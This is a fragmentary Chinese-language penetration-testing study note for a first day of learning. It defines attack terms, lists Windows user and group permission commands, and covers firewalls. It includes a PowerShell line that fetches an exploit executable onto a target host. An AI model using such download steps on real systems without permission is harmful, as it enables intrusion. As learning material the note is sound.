渗透笔记 （第一天 ）

?基础? 操作系统和渗透名词?

渗透名词?

poc? ?概念验证 漏洞证明验证?

exp? 利用? ?利用系统漏洞进行攻击动作? ? 唯一性?

payload? 有效载荷? ?在目标系统执行的代码和指令? （通道 ）

shellcode shell代码 payload的一种? 建立正向和反向的名字? ?（漏洞载荷的代码）

wehshell? ? 网页后门?

系统后门? ? 软件后门? ??

木马病毒? ? 远程控制?

病毒? ?破坏性程序? ??

反弹? 权限返回到ip上

回显?

跳板 中介? a b c? a通过b搞c? b这就是跳板?

黑白盒测试? ? ?

黑? ?没有源代码? 只要目标?

白? ?啥都有? 有源代码?

社会工程学? ? ?对人的攻击?

撞库? ? ? ?社工库撞库?

att&ck? ? ? ? ?红蓝对抗框架??

案例? ??

按照案例??

服务器? server? ?liunx?

个人pc? win10?

mac 比较少?

常见命令??

windows和liunx的?

菜鸟? ? liunx教程??

csdn 上搜windows? ?

权限问题? ?

文件权限 服务权限 用户权限

文件权限? ??

这个文件权限是在权限用户中的?

用户权限

windows的?

可以在权限查看在控制面版

单个用户的权限?

windows中 拒绝优先??

第二种?

命令

net user? ?查看用户权限?

whoami? ?查看当前用户?

管理员权限?

普通用户?

访客用户? ?

?

组用户? ? ?

在组里设置的权限在组里有效?

>net localgroup? ? 查看组?

也可以在控制面板看?

net localgroup Power Users? ?查看用户组?

net user 用户名? 查看用户所属组?

防火墙权限?

windows官方自带?

liunx防火墙?

第三方防火墙? ??

出站?

出战? 无所谓??

入站?

严格?

网站 https和http? 直接入站和出战? 一般防火墙上都允许??

内网的时候 和主机??? ?看到的防火墙才是真的防火墙?

看防火墙 的应用?

waf? ?web应用防火墙??

宝塔? ? 安全狗? ?第三方? ? 这个是专属于web的?

技术?

文件上传和下载? ?无界面??

liunx? ?

Linux:wget curl python ruby perl java? ?环境?

网站? ?

forum.ywhack.com/bountytips.php?pentest? ? 棱角? ?知识库??

演示

条件

搭建网站或者ftp? （自己搭建 ）

默认下载?

默认??

curl? wget

下载?

wget? 网站路径? ? 或者ip下载?

curl? ?网站路径 -o 保存名字??

windows的?

forum.ywhack.com/bountytips.php?download? ? windows的生成命令?

powershell.exe  -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe（地址文件） -OutFile exploit.exe"（导出名字 ）

dir? 查看当前文件?

windows的执行?

powershell?

cmd

案例二? ?反弹shell作用---------有回显?

回显就是显示命令执行不执行成功?

交互式命令? ??

passwd? ?账户? ?改密码?